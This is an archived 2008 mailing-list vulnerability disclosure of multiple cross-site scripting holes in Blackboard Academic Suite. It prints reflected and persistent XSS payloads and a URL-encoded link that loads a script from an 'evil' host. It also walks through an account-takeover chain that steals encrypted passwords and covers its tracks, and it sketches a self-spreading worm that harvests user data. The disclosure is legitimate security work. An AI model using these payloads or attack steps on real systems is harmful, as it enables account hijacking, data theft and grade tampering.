Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Blackboard Academic Suite Multiple XSS Vulnerabilities

from [knight4vn] Network Security [Permanent Link]
Subject: Blackboard Academic Suite Multiple XSS Vulnerabilities
Date: 26 Mar 2008 04:13:44 -0000 
////////////////////////////////////////////////////////////////////////////////
//Note:
//The full version of this report (in pdf format) available at my blog: 
//http://www.secskill.wordpress.com
// OR :
//http://www.scribd.com/doc/2363025/Blackboard-Academic-Suite-Multiple-XSS-Vulnerabilities-
////////////////////////////////////////////////////////////////////////////////////////


Blackboard Academic Suites Multiple Cross Site Scripting Vulnerabilities

Background:
Blackboard Academic Suite Blackboard is an enterprise software solution for 
providing interactive learning and management capabilities for educational 
institutions.
Many institutions currently are using Blackboard such as: Princeton, Yale, Duke 
University of Pennsylvania, and University of Texas at Austin ?

Platforms Affected:
All versions (7.x and lower)

Description: Combining XSS and some conditions already exists in Blackboard 
system.
Attacker can login and do everything (change grades, edit online test?s 
content?) with instructors? identity.

Vulnerable paths:
1/
http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=?><script>alert(?xss?)</script>

2/Add announcement page: (instructor access only)
http://site.edu/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course

<input type="text" name="data__announcements___pk1_pk2__subject" 
value=?<script>alert(?worm activated!?)</script>? />

Author: Duong Thanh - Knight4vn 
(knightvn (at) gmail.com or knight4vn (at) yahoo.com )

Vulnerabilities discovered: 12/2007

Vendor and Universities Contacted: 02/2008

Public disclosure: 03/2008


PART I - COMPROMISING USER?S ACCOUNT 
Explanation:
When user already has session and he/she clicks on that link (from email), the 
exploit code will be automatically executed. User?s email address is changed 
without his/her notice. At the same time, his/her current email address, first 
and last name, and current encrypted password (in User Information page) is 
logged by a remote server side script. 

The attacker reads all these information in a log file. 
After that, he gets a new user password sent to his email address by using Lost 
Password form.
With victim?s username and password, the attacker has full permission on that 
account and does whatever he wants.
Upon finishing his works, he changes back user?s initial email address and 
encrypted password.


Analysis:
Although we can change victim?s password by using exploit code but we should 
not use it. The victim can not login to the system and he/she immediately 
realize there is something fishy.

Edit Personal Info page:
http://site.edu/webapps/blackboard/execute/editUser?context=self_modify

Blackboard stores encrypted user password in Edit Personal Info page:

<INPUT TYPE="hidden" NAME="password" VALUE="CE0BFD15059B68D67688884D7A3D3E8C">

Hence, we have no problem with grabbing current user?s encrypted password. 


On this page: 
http://site.edu/bin/common/user.pl?action=MODIFY&context=PASSWORD
Blackboard calls a function in ?/javascript/md5.js? to encrypt password on 
client side before submitting this form to 
?/webapps/blackboard/execute/editUser?. So it?s possible to submit directly 
encrypted password to the server side script. Therefore, we take advantage of 
this to bring victim?s encrypted password back to its initial state.
As a result, victim?s account was compromised completely without his/her 
awareness.

Proof-of-concept: 
Steal.js



PART II - MAKING A WEB-BASED WORM

Just imagine what would happen if someone took advantage of these holes to 
create a javascript-based worm? Think about this scenario for a second:
A black-hat guy wrote a worm and he send it to a person (for ex: an instructor).
The instructor immediately gets infected. The worm uses his identity to spread 
by sending itself to all student current enrolling his courses. Students get 
infected; the worm once again uses their identity to send itself to all their 
classmates and their other instructors? Combination of multiple XSS 
vulnerabilities make the worm spread very fast.
During its propagation, the worm could log all private users info (emails, 
names, grades?) then report back to the attacker (for spamming purposes), or it 
could simply do whatever the attacker wants with user account.

ANALYSIS:
Blackboard does not filter on title of Announcement

<input type="text" name="data__announcements___pk1_pk2__subject" 
value=?<script>alert(?worm activated!?)</script>? />

So we can take advantage of this persistent XSS to inject arbitrary script on 
the web page.
The announcement will be posted on the front page. So once students log in 
The malicious script will have to be run at least one time. 


Students spread this worm by sending the infected link to their classmates 
and his other instructors via Send mail form of Blackboard.
Here is what a student will be forced to send in the email.

Encoded Version:
Hi,
I don?t understand today online assignment. Would you mind helping me out?
http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=%94%3E%3C%73%63%72%69%70%74%20%73%72%63%20%3D%20%91%68%74%74%70%3A%2F%2F%65%76%69%6C%2F%77%6F%72%6D%2E%6A%73%92%3E%3C%2F%73%63%72%69%70%74%3E

Proof-Of-Concept: worm.js

Worm Features:
Log all user info and send them to the attacker.
Propanagate by Send mail form and create announcements with hidden malicious 
script.

CONCLUSION:
It is possible for hackers to silently steal instructor?s password and change 
his grade. In worst case, he could use XSS worm to take the entire system down 
(MySpace?s case). The consequence is foreseeable.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Blackboard Academic Suite Multiple XSS Vulnerabilities, knight4vn <=
Previous by Date:  phpBB PJIRC mod LFI, 0in . email
Next by Date:  [security bulletin] HPSBTU02322 SSRT080011 rev.1 - HP Tru64 UNIX running SSH/SFTP Server, Remote Execution of Arbitrary Code or Denial of Service (DoS), security-alert
Previous by Thread:  phpBB PJIRC mod LFI, 0in . email
Next by Thread:  [security bulletin] HPSBTU02322 SSRT080011 rev.1 - HP Tru64 UNIX running SSH/SFTP Server, Remote Execution of Arbitrary Code or Denial of Service (DoS), security-alert
Indexes:  [Date] [Thread] [Top] [All Lists]